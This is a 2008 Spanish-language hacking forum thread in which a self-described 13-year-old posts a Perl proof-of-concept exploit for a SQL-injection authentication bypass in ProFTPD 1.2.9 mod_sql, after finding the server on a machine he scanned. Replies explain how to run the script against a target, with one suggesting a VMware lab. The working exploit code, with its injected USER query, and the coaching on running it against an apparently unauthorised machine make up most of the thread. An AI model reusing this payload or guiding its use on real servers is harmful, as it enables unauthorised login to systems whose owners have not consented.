Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse. - Mayo 17, 2008, 12:11:30
Boton Buscar
Inicio Ayuda Calendario Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: AYUDA VULNERABILIDAD ProFTPD 1.2.9 Server 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: AYUDA VULNERABILIDAD ProFTPD 1.2.9 Server  (Leído 147 veces)
hack_boy
Recien Llegado
*
Desconectado Desconectado

Mensajes: 12


hackeando IE con firefox


Ver Perfil
« en: Marzo 15, 2008, 10:00:19 »

hola a todos soy nuevo aqui tengo 13 años y me gusta el hacking, primero hize un mapeo con el nmap  y encontre una maquina que tiene el puerto 21 abierto y trate de conectarme al ftp desde el cmd y encontre que tiene el ProFTPD 1.2.9 Server y luego encontre este exploit para el ProFTPD 1.2.9 Server pero no se para que sirve se supone que es para explotar una vulnerabilidad pero si lo ejecuto y me aparece otra cosa y no voy a saber que hacer si alguien me pudiera ayudar xfas Undecided

P.D. NO SE SI ESTE BIEN SI ALGUIEN DE USTEDES PUDIERA CORREGIRLO, OTRA CON QUE PROGRAMA LO COMPILO


#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if( @ARGC<2){
 print "\nProof Of Concept Sql Inject on ProFTPD\n";
 print "Usage: perl poc-sqlftp <target> [1=Alternate
query]\n\n";
 exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)

 or die "Can't connect. \n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
 print $remote "USER ')UNION
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
 print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
WHERE(''='\n";
};
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
 print "[------- Sql Inject Able \n";
}else{
 print "[------- Sql Inject Unable \n";
}
close $remote;
En línea
Proxy Lainux
Miembro
*****
Desconectado Desconectado

Mensajes: 73



Ver Perfil Email
« Respuesta #1 en: Marzo 23, 2008, 02:50:24 »

hola

primero, para compilar eso, si estas en windows... tienes ke descargar un compilador de perl... trata de buscar alguno ke se te haga sencillo...

y segundo... sobre el tema de metasploit ke pusiste... la nueva version 3.1 le han cambiado cosas... asi ke tendras ke investigar bien si han habido cambios en los comandos... yo me kede hasta la version 2.5 asi ke no creo poder ayudarte...

tambien podria pasarte ke hayas lanzado el exploit, pero ya esta parchado.. asi ke aunke llegue el exploit talvez ya no funciona...

asi ke si no puedes hacer tal cosa... es porke talvez no se creo ninguna shell... te recomiendo ke instales un virtualizador como VMware y ke instales dos sistemas windows... despues instala la version de apache ke te aparece en el metasploit... y fijate ke pasa.. sino pasa nada.. es porke ya no funciona... pero si te pasa algo diferente.. kiere decir ke algo no esta bien.. o ke incluso la victima logra detener el atake...

espero esto te sirva... nos vemos
« Última modificación: Marzo 23, 2008, 03:15:16 por Proxy Lainux » En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2013


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #2 en: Marzo 24, 2008, 03:03:20 »

Citar
# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query..

Perl, Inyecion Sql.
Busca sobre ese lenguaje y sobre esos tipos de bugs,.

POC, son pruebas..

pero prova.
Usage: perl poc-sqlftp <target>

Usage: perl poc-sqlftp
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.pagina.com


En línea


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
blood_r3c
Moderación
Colaborador
*****
Desconectado Desconectado

Mensajes: 408


uid=0(root) gid=0(root) groups=0(root)


Ver Perfil WWW
« Respuesta #3 en: Marzo 30, 2008, 05:21:41 »

el problema es el nombre que le distes al exploit.... por ejemplo deberias poner...
cd Desktop (recomendacion en el desktop para que no te muevas a tantos directorios)
 perl elnombredelexploit.pl
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.idiotas.com


te va a dar la indicacion y nada lo haces nuevamente pero con su nombre si no te sale dale permisos de ejecucion....

pero siempre con el nombre que le diste no el que sale en el exploit...

salu2
En línea

Fuck +|-|3 3t|-|ik4l H4c|<iNg
Black Roots Group
HOLA BUENAS BOSOTROS SABEIS COMO PUEDO JAQUEAR EL JOTMAIL, ESQUE ME SE HA OLVIDADO LA CONTRASEÑA Y NO SE COMO REPUCERARLA

GRACIAS DE ANTEBRAZO
Me Imagino Que No Puede Ni entrar A
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion Roll Eyes -->Cheesy<--
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2013


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #4 en: Abril 01, 2008, 06:49:45 »

pero acaso no te fijas, preguntaste lo mismo en otro post.
fijate en la extencion, le sakas el .pl.


el mismo tema esta en otro post..
deja de postear doble.
En línea


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: AYUDA VULNERABILIDAD ProFTPD 1.2.9 Server « anterior próximo »
Ir a:  
Novedades, Dudas, Comentarios Y Sugerencias, Top 100, Off-Topic, Revista E-Zine, Revista E-Zine, Sistemas operativos libres. , HacK GeneraL, Phreaking, Bug y Exploits, Networking & Wireless, Overclocking, Refrigeracion y demas, Hardware, Electronica Y Robotica, Hack para newbies, Todo Messenger, Troyanos y virus, Programacion, Programacion para webmasters, Software, Cracks & Serialz, P2p, Bittorrent, Elinks, Diseño Grafico, Juegos PC, Mp3, Multimedia, Peliculas Divx, Juegos, Humor y Adultos. (Diversion), Paginas Webs Recomendadas, Videos,


Zona-Musical Juegos online Juego Gratis10 Solucion Hosting Videos De Musica 1juegogratis Dragonjar
Noticias
 Juegos De Coche juegos gratis online juegos Los Foros De Sexe Gratuit Sexo Duro Tierra Messenger Trucos
Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC